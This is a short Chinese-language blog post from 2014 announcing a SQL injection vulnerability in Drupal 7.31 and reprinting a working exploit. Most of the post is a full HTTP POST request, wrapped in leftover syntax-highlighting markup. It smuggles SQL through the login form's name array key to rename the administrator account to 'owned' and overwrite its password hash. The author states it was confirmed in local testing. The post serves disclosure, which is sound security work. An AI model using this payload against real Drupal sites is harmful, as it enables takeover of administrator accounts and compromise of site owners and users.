Drupal 7.31爆严重SQL注入漏洞【附利用
admin发表于 2014-11-22 10:16:06
今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。测试代码
<span class="pln">POST </span><span class="pun">/</span><span class="pln">drupal</span><span class="pun">-</span><span class="lit">7.31</span><span class="pun">/?</span><span class="pln">q</span><span class="pun">=</span><span class="pln">node</span><span class="pun">&</span><span class="pln">destination</span><span class="pun">=</span><span class="pln">node HTTP</span><span class="pun">/</span><span class="lit">1.1</span> <span class="typ">Host</span><span class="pun">:</span><span class="pln"> </span><span class="lit">127.0</span><span class="pun">.</span><span class="lit">0.1</span> <span class="typ">User</span><span class="pun">-</span><span class="typ">Agent</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Mozilla</span><span class="pun">/</span><span class="lit">5.0</span><span class="pln"> </span><span class="pun">(</span><span class="pln">X11</span><span class="pun">;</span><span class="pln"> </span><span class="typ">Ubuntu</span><span class="pun">;</span><span class="pln"> </span><span class="typ">Linux</span><span class="pln"> x86_64</span><span class="pun">;</span><span class="pln"> rv</span><span class="pun">:</span><span class="lit">28.0</span><span class="pun">)</span><span class="pln"> </span><span class="typ">Gecko</span><span class="pun">/</span><span class="lit">20100101</span><span class="pln"> </span><span class="typ">Firefox</span><span class="pun">/</span><span class="lit">28.0</span> <span class="typ">Accept</span><span class="pun">:</span><span class="pln"> text</span><span class="pun">/</span><span class="pln">html</span><span class="pun">,</span><span class="pln">application</span><span class="pun">/</span><span class="pln">xhtml</span><span class="pun">+</span><span class="pln">xml</span><span class="pun">,</span><span class="pln">application</span><span class="pun">/</span><span class="pln">xml</span><span class="pun">;</span><span class="pln">q</span><span class="pun">=</span><span class="lit">0.9</span><span class="pun">,*</span><span class="com">/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/drupal-7.31/ Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 231 name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in</span>
参考:http://www.freebuf.com/vuls/47271.html